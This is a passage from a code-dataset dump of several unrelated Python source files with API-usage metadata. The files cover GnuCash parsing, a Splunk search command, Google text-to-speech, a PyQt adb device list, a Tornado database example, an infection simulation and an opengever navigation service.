"numpy.array", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 191, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 198, "usage_type": "call"}, {"api_name": "torch.nn.modules.Module", "line_number": 228, "usage_type": "name"}, {"api_name": "numpy.ndim", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 257, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 258, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 264, "usage_type": "call"}]} +{"seq_id": "548821273", "text": "import cPickle\nimport gzip\nimport os.path\nimport sys\nfrom subprocess import PIPE, Popen\nfrom warnings import warn\n\nimport yaml\n\nfrom koert.gnucash.xmlformat import SaxHandler\n\n\ndef open_gcf_in_git_repo(repopath, filepath, cachepath=None, scheme=None):\n from git import Repo\n\n repo = Repo(repopath)\n commit = repo.head.commit\n mtime = commit.authored_date\n f = commit.tree[filepath].data_stream\n\n result = parse_gcf(f, mtime, cachepath=cachepath, scheme=scheme)\n\n f.read()\n\n return result\n\n\ndef open_pos_gzipped(filepath):\n f = None\n try:\n # Only after a byte is read, is the check whether filepath\n # points to a gzipped file performed.\n f = gzip.open(filepath)\n f.read(1)\n f.rewind()\n except IOError:\n # message should read: \"Not a gzipped file\"\n f = open(filepath)\n return f\n\n\ndef saxparse(f, handler):\n from xml.sax import parse as saxparse\n saxparse(f, handler)\n\n\ndef lxmlparse(f, handler):\n from lxml.etree import parse as lxmlparse\n from lxml.sax import saxify\n etree = lxmlparse(f)\n saxify(etree, handler)\n\n\ndef cache_path(filepath):\n return filepath + \".pickled\"\n\n\ndef get_commit_name():\n directory = os.path.dirname(__file__)\n p = Popen('git rev-parse HEAD',\n stdout=PIPE, shell=True, cwd=directory)\n outp, err = p.communicate()\n return outp\n\n\ndef load_cache(cachepath, mtime):\n if not os.path.exists(cachepath):\n return False\n # Do not use the cache if the gnucash file is newer\n if mtime >= os.path.getmtime(cachepath):\n return False\n with open(cachepath, \"r\") as f:\n current_commit_name = get_commit_name()\n try:\n cached_commit_name, gcf = cPickle.load(f)\n if cached_commit_name != current_commit_name:\n return False\n print(\"loaded cache %s\" % cachepath)\n return gcf\n except Exception as e:\n warn(\"Failed to load pickled cache of Gnucash file \"\n \"'%s': %s\" % (cachepath, repr(e)))\n return False\n\n\ndef update_cache(cachepath, gcf):\n if sys.getrecursionlimit() < 2000:\n sys.setrecursionlimit(2000)\n with open(cachepath, \"w\") as f:\n try:\n cPickle.dump((get_commit_name(), gcf), f)\n except RuntimeError as e:\n warn(\"\"\"Failed to dump a pickled version of the \\\ngnucash file \"%s\" due to the RuntimeError below. If this is a stack \\\noverflow, you might want to increase the maximum recursion depth by \\\nsys.setrecursionlimit.\"\"\")\n raise e\n\n\ndef parse_gcf(f, mtime, scheme=None, parse=saxparse, cachepath=None):\n if cachepath is not None:\n result = load_cache(cachepath, mtime)\n if result:\n return result\n handler = SaxHandler(scheme)\n parse(f, handler)\n result = handler.result\n result.mtime = mtime\n update_cache(cachepath, result)\n return result\n\n\ndef open_gcf(filepath, scheme=None, parse=saxparse, cachepath=None):\n if cachepath is None:\n cachepath = cache_path(filepath)\n with open(filepath) as f:\n return parse_gcf(f, os.path.getmtime(filepath),\n scheme=scheme, parse=parse, cachepath=cachepath)\n\n\ndef open_yaml(path):\n with open(path) as f:\n d = yaml.load(f)\n\n dirname = os.path.dirname(path)\n gcf_path = os.path.join(dirname, d['path'])\n cache_path = None\n if \"cache\" in d:\n cache_path = os.path.join(dirname, d['cache'])\n gcf = None\n if 'repo' in d:\n repo_path = os.path.join(dirname, d['repo'])\n gcf = open_gcf_in_git_repo(repo_path, d['path'], cachepath=cache_path)\n else:\n gcf = open_gcf(gcf_path, cachepath=cache_path)\n if 'meta' in d:\n gcf.meta = d['meta']\n\n return gcf\n", "sub_path": "sm/gnucash/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 3788, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "git.Repo", "line_number": 16, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 33, "usage_type": "call"}, {"api_name": "xml.sax.parse", "line_number": 44, "usage_type": "call"}, {"api_name": "lxml.etree.parse", "line_number": 50, "usage_type": "call"}, {"api_name": "lxml.sax.saxify", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 59, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 60, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 61, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 67, "usage_type": "name"}, {"api_name": "os.path.path.getmtime", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 70, "usage_type": "name"}, {"api_name": "cPickle.load", "line_number": 75, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.getrecursionlimit", "line_number": 87, "usage_type": "call"}, {"api_name": "sys.setrecursionlimit", "line_number": 88, "usage_type": "call"}, {"api_name": "cPickle.dump", "line_number": 91, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 93, "usage_type": "call"}, {"api_name": "xml.sax.parse", "line_number": 100, "usage_type": "name"}, {"api_name": "koert.gnucash.xmlformat.SaxHandler", "line_number": 105, "usage_type": "call"}, {"api_name": "xml.sax.parse", "line_number": 113, "usage_type": "name"}, {"api_name": "os.path.path.getmtime", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 117, "usage_type": "name"}, {"api_name": "yaml.load", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 125, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 126, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 129, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 132, "usage_type": "name"}]} +{"seq_id": "190884705", "text": "import sys\nimport json\nfrom splunklib.searchcommands import dispatch, StreamingCommand, Configuration, Option\nfrom splunklib.searchcommands.validators import Fieldname\nimport environment_data\n\n\n@Configuration(local=True)\nclass EnvironmentInstancesUpdateState(StreamingCommand):\n\n state_field = Option(validate=Fieldname())\n name_field = Option(validate=Fieldname())\n\n def stream(self, instances):\n for instance in instances:\n environment_id = instance[\"environment_id\"]\n instance_state = instance[self.state_field]\n instance_name = instance[self.name_field]\n\n self.service.post(\"/services/msaas/environments/%s/instances/%s\" % (environment_id, instance_name), body=json.dumps({\n \"state\": instance_state,\n }))\n # environment_data.update_instance(\n # self.service, environment_id, instance_name,\n # instance_state=instance_state)\n yield instance\n\ndispatch(EnvironmentInstancesUpdateState,\n sys.argv, sys.stdin, sys.stdout, __name__)\n", "sub_path": "apps/msaas/bin/environment_instances_update_state_command.py", "file_name": "environment_instances_update_state_command.py", "file_ext": "py", "file_size_in_byte": 1069, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "splunklib.searchcommands.StreamingCommand", "line_number": 9, "usage_type": "name"}, {"api_name": "splunklib.searchcommands.Option", "line_number": 11, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.validators.Fieldname", "line_number": 11, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.Option", "line_number": 12, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.validators.Fieldname", "line_number": 12, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 20, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.Configuration", "line_number": 8, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.dispatch", "line_number": 28, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "210347852", "text": "import os\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = './config/My Project-bd8af4dfa881.json'\nfrom google.cloud import texttospeech\nimport base64\nimport subprocess\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nimport io\n\n\n\ndef create_google_sst(text):\n client = texttospeech.TextToSpeechClient()\n synthesis_input = texttospeech.types.SynthesisInput(text=text)\n voice = texttospeech.types.VoiceSelectionParams(\n name=\"en-US-Wavenet-F\",\n language_code='en-US', \n ssml_gender=texttospeech.enums.SsmlVoiceGender.FEMALE\n )\n audio_config = texttospeech.types.AudioConfig(\n audio_encoding=texttospeech.enums.AudioEncoding.MP3,\n pitch=2.0,\n speaking_rate=1.26\n )\n \n response = client.synthesize_speech(synthesis_input, voice, audio_config)\n audio = base64.b64decode(response.audio_content)\n\n song = AudioSegment.from_file(io.BytesIO(audio), format=\"mp3\")\n play(song)\n\ncreate_google_sst(\"how can I help you ?\")", "sub_path": "scrath.py", "file_name": "scrath.py", "file_ext": "py", "file_size_in_byte": 1028, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.environ", "line_number": 2, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech.TextToSpeechClient", "line_number": 13, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech", "line_number": 13, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.types.SynthesisInput", "line_number": 14, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech.types", "line_number": 14, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 14, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.types.VoiceSelectionParams", "line_number": 15, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech.types", "line_number": 15, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 15, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.enums", "line_number": 18, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 18, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.types.AudioConfig", "line_number": 20, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech.types", "line_number": 20, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 20, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.enums", "line_number": 21, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 21, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 27, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_file", "line_number": 29, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 29, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 29, "usage_type": "call"}, {"api_name": "pydub.playback.play", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "620220901", "text": "import sys, subprocess\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QHBoxLayout, QTreeWidget, QTreeWidgetItem, QGroupBox, QPushButton, QApplication\nfrom PyQt5 import QtCore\n\nclass MyApp(object): \n def __init__(self):\n super(MyApp, self).__init__() \n self.mainWidget = QWidget()\n self.mainLayout = QVBoxLayout()\n self.mainWidget.setLayout(self.mainLayout)\n\n self.hLayout = QHBoxLayout()\n self.mainLayout.insertLayout(0, self.hLayout)\n\n\n self.listA=QTreeWidget()\n self.listA.setColumnCount(3)\n self.listA.setHeaderLabels(['Checkbox','Name','Data'])\n for i in range(3):\n item=QTreeWidgetItem()\n item.setCheckState(0, 2)\n item.setText(1, 'Item '+str(i))\n item.setData(2, 256, id(item) )\n item.setText(2, str(id(item) ) )\n self.listA.addTopLevelItem(item)\n\n self.hLayout.addWidget(self.listA)\n\n self.buttonGroupbox = QGroupBox()\n self.buttonlayout = QVBoxLayout()\n self.buttonGroupbox.setLayout(self.buttonlayout)\n\n okButton = QPushButton('Remove Selected')\n okButton.clicked.connect(self.removeSel)\n self.buttonlayout.addWidget(okButton)\n\n getDataButton = QPushButton('Get Items Data')\n getDataButton.clicked.connect(self.getItemsData)\n self.buttonlayout.addWidget(getDataButton)\n\n self.mainLayout.addWidget(self.buttonGroupbox)\n self.mainWidget.show()\n sys.exit(app.exec_())\n\n def removeSel(self):\n listItems = []\n for i in range(self.listA.topLevelItemCount()):\n item=self.listA.topLevelItem(i)\n print(\"item\", item)\n if (item.checkState(0) == 2):\n listItems.append(item)\n\n print(\"listItems: \",listItems)\n\n for item in listItems:\n print(\"item: \", item)\n itemIndex=self.listA.indexOfTopLevelItem(item)\n print(\"itemIndex\", itemIndex)\n self.listA.takeTopLevelItem(itemIndex)\n print('\\n\\t Number of items remaining', self.listA.topLevelItemCount())\n\n def getItemsData(self):\n for i in range(self.listA.topLevelItemCount()):\n item=self.listA.topLevelItem(i)\n itmData=item.data(2, 256)\n print('\\n\\t Item Id Stored as Item Data:', itmData, 'Item Checkbox State:', item.checkState(0))\n\nif __name__ == '__main__':\n what = subprocess.Popen(['adb', 'devices', '-l'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, errs = what.communicate()\n out = str(out, 'utf-8')\n outs = out.split()\n del outs[0:4]\n length = len(outs)\n n = length/6\n struct = [[] for i in range(int(n))]\n for i in range(int(n)):\n print(n, i)\n struct[i] = outs[i*6:(i+1)*6]\n print(struct[i])\n app = QApplication(sys.argv)\n MyApp()", "sub_path": "PythGUI/gui2.py", "file_name": "gui2.py", "file_ext": "py", "file_size_in_byte": 2871, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 8, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 12, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTreeWidget", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTreeWidgetItem", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 33, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 37, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 69, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 81, "usage_type": "attribute"}]} +{"seq_id": "617248015", "text": "import tornado.ioloop\nimport tornado.web\nimport psycopg2.extras\nimport notorm\nimport tornado.autoreload\n\nclass Game(notorm.record):\n _fields = {'id':None,\n 'name':None\n }\n\n insert_qry = \"\"\"\n insert into game (name)\n values(%(name)s)\n returning id\n \"\"\"\n\n update_qry = \"\"\"\n update game set name=%(name)s where id = %(id)s\n \"\"\"\n\n @classmethod\n def get(cls, game_id):\n cursor = notorm.db.cursor(cursor_factory=psycopg2.extras.NamedTupleCursor)\n cursor.execute(\"\"\"select game.*::game from game where id = %(game_id)s\"\"\",\n {'game_id': game_id})\n\n results = cursor.fetchall()\n games = notorm.build_relationships(results, 'game')\n if not games:\n return None\n return games[0]\n\n @classmethod\n def get_all(cls):\n cursor = notorm.db.cursor(cursor_factory=psycopg2.extras.NamedTupleCursor)\n cursor.execute(\"\"\"select game.*::game from game order by name\"\"\")\n\n results = cursor.fetchall()\n games = notorm.build_relationships(results, 'game')\n return games\n\nclass GameComposite(psycopg2.extras.CompositeCaster):\n def make(self, values):\n d = dict(zip(self.attnames, values))\n return Game(**d)\n\nclass ExampleRequestHandler(tornado.web.RequestHandler):\n def on_finish(self):\n notorm.db.commit()\n\n def log_exception(self, typ, value, tb):\n print(\"Exception\")\n notorm.db.rollback()\n return super(ExampleRequestHandler, self).log_exception(typ, value, tb)\n\nclass MainHandler(ExampleRequestHandler):\n def get(self):\n games = Game.get_all()\n self.render(\"../main.html\", games=games)\n\nclass GameHandler(ExampleRequestHandler):\n def get(self, game_id=None):\n if game_id:\n game = Game.get(game_id)\n else:\n game = Game()\n self.render(\"../edit.html\", game=game)\n\n def post(self, game_id=None):\n if game_id:\n game = Game.get(game_id)\n else:\n game = Game()\n game.name = self.get_argument('name')\n game.save()\n self.redirect(\"/\")\n\ndef make_app():\n return tornado.web.Application([\n (r\"/\", MainHandler),\n (r\"/game/new\", GameHandler),\n (r\"/game/([0-9]+)\", GameHandler)\n ])\n\nif __name__ == \"__main__\":\n notorm.db = psycopg2.connect(\"dbname=notorm_example user=dbuser\")\n\n cursor = notorm.db.cursor()\n psycopg2.extras.register_composite('game', cursor, globally=True, factory = GameComposite)\n app = make_app()\n app.listen(8888)\n tornado.autoreload.start(tornado.ioloop.IOLoop.current())\n tornado.ioloop.IOLoop.current().start()", "sub_path": "examples/tornadosync/tornadosync.py", "file_name": "tornadosync.py", "file_ext": "py", "file_size_in_byte": 2690, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "notorm.record", "line_number": 7, "usage_type": "attribute"}, {"api_name": "notorm.db.cursor", "line_number": 24, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 24, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.extras", "line_number": 24, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 24, "usage_type": "name"}, {"api_name": "notorm.build_relationships", "line_number": 29, "usage_type": "call"}, {"api_name": "notorm.db.cursor", "line_number": 36, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 36, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.extras", "line_number": 36, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 36, "usage_type": "name"}, {"api_name": "notorm.build_relationships", "line_number": 40, "usage_type": "call"}, {"api_name": "psycopg2.extras.extras", "line_number": 43, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 43, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 48, "usage_type": "name"}, {"api_name": "notorm.db.commit", "line_number": 50, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 50, "usage_type": "attribute"}, {"api_name": "notorm.db.rollback", "line_number": 54, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tornado.ioloop.web.Application", "line_number": 80, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 80, "usage_type": "name"}, {"api_name": "notorm.db", "line_number": 87, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.connect", "line_number": 87, "usage_type": "call"}, {"api_name": "psycopg2.extras", "line_number": 87, "usage_type": "name"}, {"api_name": "notorm.db.cursor", "line_number": 89, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 89, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.extras.register_composite", "line_number": 90, "usage_type": "call"}, {"api_name": "psycopg2.extras.extras", "line_number": 90, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 90, "usage_type": "name"}, {"api_name": "tornado.ioloop.autoreload.start", "line_number": 93, "usage_type": "call"}, {"api_name": "tornado.ioloop.autoreload", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 93, "usage_type": "name"}, {"api_name": "tornado.ioloop.ioloop.IOLoop.current", "line_number": 93, "usage_type": "call"}, {"api_name": "tornado.ioloop.ioloop", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tornado.ioloop.ioloop.IOLoop.current", "line_number": 94, "usage_type": "call"}, {"api_name": "tornado.ioloop.ioloop", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 94, "usage_type": "name"}]} +{"seq_id": "545420405", "text": "import random\nfrom datetime import datetime, timedelta\n\nfrom Person import Person\n\n\nclass Place:\n\n def __init__(self, place_info):\n self.population = set()\n self.place_info = place_info # (40.760265, -73.989105, 'Italian', '217', '291', 'Ristorante Da Rosina')\n self.time_to_recover = 14\n self.total_infected_number = 0\n self.immune_population = set()\n\n def get_population(self):\n return self.population\n\n def get_total_infected(self):\n return self.total_infected_number\n\n def set_population(self, new_population):\n self.population = new_population\n\n def set_total_movements(self, number):\n self.total_movements = number\n self.init_population(self.total_movements) # initilise population according to place popularity\n\n def init_population(self, number):\n start_time = datetime(2010, 12, 21, 20, 0, 0)\n for i in range(number):\n person = Person()\n # infect with a certain probability\n if random.random() <= 0.001:\n person.set_infected(start_time)\n self.add_person(person)\n\n def get_total_movements(self):\n return self.total_movements\n\n def add_person(self, person):\n self.population.add(person)\n\n def incubate_cycle(self, current_time_o):\n ''' Process local population at a place and yield a new cycle of infections '''\n\n # set recovered timedelta(days=1): set time_to_recover, current_time\n infected_pop = [p for p in self.population if p.get_status() == 1]\n recovered_pop = [p.set_immune(current_time_o) for p in infected_pop if\n current_time_o - p.get_time_infected() > timedelta(days=self.time_to_recover)]\n infected_pop = set(infected_pop).difference(recovered_pop) # infected pop - recovered\n # print (len(infected_pop))\n # print (len(recovered_pop))\n # print (len(self.population))\n # print ('----')\n\n # calculate number of infected people\n total_infected = len(infected_pop)\n # if total_infected == 0:\n # \t#if there is no infected person at place, no one else can be infected (ie do not execute code below)\n # \treturn\n\n total_pop = len(self.population)\n\n # calculate susceptible to infection\n susceptible_pop = self.population.difference(infected_pop)\n susceptible_pop = susceptible_pop.difference(self.immune_population)\n self.immune_population = self.immune_population.union(recovered_pop)\n\n # calculate probability of infection\n if total_pop == 0:\n prob_infection = 0.0\n else:\n prob_infection = total_infected / total_pop\n\n # calculate newly infected number\n newly_infected_num = int(len(susceptible_pop) * prob_infection)\n\n # set newly infected persons accordingly\n newly_infected_pop = random.choices(tuple(susceptible_pop), k=newly_infected_num)\n for i in range(newly_infected_num):\n newly_infected_pop[i].set_infected(current_time_o)\n\n # count number infected\n self.total_infected_number = len(infected_pop) + newly_infected_num\n\n def set_recovered(self):\n ''' Process local population and yield a new cycle of recoveries (death case will be added later)'''\n pass\n", "sub_path": "Place.py", "file_name": "Place.py", "file_ext": "py", "file_size_in_byte": 3342, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime", "line_number": 30, "usage_type": "call"}, {"api_name": "Person.Person", "line_number": 32, "usage_type": "call"}, {"api_name": "random.random", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 50, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "541244773", "text": "from Acquisition import aq_parent\nfrom ftw.solr.interfaces import ISolrSearch\nfrom ftw.solr.query import make_filters\nfrom opengever.base.browser.navigation import make_tree_by_url\nfrom opengever.base.interfaces import IOpengeverBaseLayer\nfrom opengever.base.solr import OGSolrDocument\nfrom opengever.repository.interfaces import IRepositoryFolder\nfrom opengever.repository.repositoryfolder import REPOSITORY_FOLDER_STATE_INACTIVE\nfrom opengever.repository.repositoryroot import IRepositoryRoot\nfrom plone.app.contentlisting.interfaces import IContentListingObject\nfrom plone.restapi.interfaces import IExpandableElement\nfrom plone.restapi.serializer.converters import json_compatible\nfrom plone.restapi.services import Service\nfrom Products.CMFPlone.interfaces.siteroot import IPloneSiteRoot\nfrom zExceptions import BadRequest\nfrom zope.component import adapter\nfrom zope.component import getUtility\nfrom zope.dottedname.resolve import resolve\nfrom zope.interface import implementer\nfrom zope.interface import Interface\n\n\n@implementer(IExpandableElement)\n@adapter(Interface, IOpengeverBaseLayer)\nclass Navigation(object):\n\n FIELDS = [\n 'UID',\n 'path',\n 'portal_type',\n 'review_state',\n 'Title',\n 'title_de',\n 'title_en',\n 'title_fr',\n 'Description',\n 'filename',\n 'has_sametype_children',\n 'is_subdossier',\n 'dossier_type',\n ]\n\n def __init__(self, context, request):\n self.context = context\n self.request = request\n self.solr = getUtility(ISolrSearch)\n\n def __call__(self, expand=False):\n root_interface = self.get_root_interface()\n content_interfaces = self.get_content_interfaces()\n\n if self.request.form.get('include_root'):\n content_interfaces.append(root_interface)\n\n result = {\n 'navigation': {\n '@id': '{}/@navigation'.format(self.context.absolute_url()),\n },\n }\n\n if not expand:\n return result\n\n root = self.find_root(root_interface, content_interfaces)\n solr_docs = self.query_solr(root, content_interfaces)\n\n nodes = map(self.solr_doc_to_node, solr_docs)\n result['navigation']['tree'] = make_tree_by_url(nodes)\n\n return result\n\n def find_root(self, root_interface, content_interfaces):\n context = self.context\n\n if root_interface not in content_interfaces:\n while (not root_interface.providedBy(context)\n and not IPloneSiteRoot.providedBy(context)):\n context = aq_parent(context)\n else:\n # This happens i.e. on lookup a dossier tree from a subdossier.\n #\n # The current context is the subdossier which is also\n # providing the root_interface. We have to get sure, that we return\n # the most upper object providing the given root_interface if\n # the root_interface is within `content_interfaces`\n current = context\n while (not IPloneSiteRoot.providedBy(current)):\n if root_interface.providedBy(current):\n context = current\n current = aq_parent(current)\n\n if root_interface.providedBy(context):\n root = context\n else:\n response = self.solr.search(\n filters=make_filters(\n object_provides=root_interface.__identifier__),\n sort='path asc',\n fl=[\"path\"],\n )\n roots = [OGSolrDocument(d) for d in response.docs]\n\n if roots:\n root = roots[0].getObject()\n else:\n raise BadRequest(\"No root found for interface: {}\".format(\n root_interface.__identifier__))\n return root\n\n def query_solr(self, root, content_interfaces):\n query = {\n 'object_provides': [i.__identifier__ for i in content_interfaces],\n 'path_parent': '/'.join(root.getPhysicalPath()),\n 'trashed': 'false',\n }\n\n review_states = self.request.form.get('review_state', [])\n if review_states:\n query['review_state'] = review_states\n\n filters = make_filters(**query)\n\n if self.request.form.get('include_context'):\n # Include context branch's UIDs in the query, by adding them as\n # a filter that is OR'ed with the main filters (which themselves\n # are AND'ed together). This is necessary because restrictions\n # from the main filters must not be applied to the context branch.\n context_uids = list(self.get_context_branch_uids(root))\n if context_uids:\n context_filter = make_filters(UID=context_uids)[0]\n main_filters = self._join_filters(make_filters(**query), 'AND')\n filters = self._join_filters([main_filters, context_filter], 'OR')\n\n resp = self.solr.search(\n filters=filters,\n sort='sortable_title asc',\n rows=10000,\n fl=self.FIELDS)\n\n return [OGSolrDocument(doc) for doc in resp.docs]\n\n def get_context_branch_uids(self, root):\n \"\"\"Return UIDs of the current context's chain up to the root.\n \"\"\"\n for item in self.context.aq_chain:\n item_uid = item.UID()\n if item_uid == root.UID():\n break\n yield item_uid\n\n def _lookup_iface_by_identifier(self, identifier):\n return resolve(identifier) if identifier else None\n\n def _join_filters(self, filters, op):\n op = ' %s ' % op\n return op.join(['(%s)' % flt for flt in filters])\n\n def get_root_interface(self):\n \"\"\"Lookups the root_interface provided within the request parameter.\n\n This interface is used as the navigation root identifier.\n \"\"\"\n interface = self.request.form.get('root_interface')\n try:\n return self._lookup_iface_by_identifier(\n interface) or IRepositoryRoot\n except ImportError:\n raise BadRequest(\"The provided `root_interface` could not be \"\n \"looked up: {}\".format(interface))\n\n def get_content_interfaces(self):\n \"\"\"Lookups the content_interfaces provided within the request parameter.\n\n The interfaces provided in `content_interfaces` are used as navigation\n items.\n \"\"\"\n interfaces = self.request.form.get('content_interfaces')\n if not interfaces:\n return [IRepositoryFolder]\n\n if not isinstance(interfaces, list):\n interfaces = [interfaces]\n\n content_interfaces = []\n for interface in interfaces:\n try:\n content_interfaces.append(\n self._lookup_iface_by_identifier(interface))\n except ImportError:\n raise BadRequest(\"The provided `content_interfaces` could not be \"\n \"looked up: {}\".format(interface))\n return content_interfaces\n\n def solr_doc_to_node(self, solr_doc):\n wrapper = IContentListingObject(solr_doc)\n context_url = self.context.absolute_url()\n\n node = {\n '@type': wrapper.portal_type,\n 'text': wrapper.Title(),\n 'description': wrapper.Description(),\n 'url': 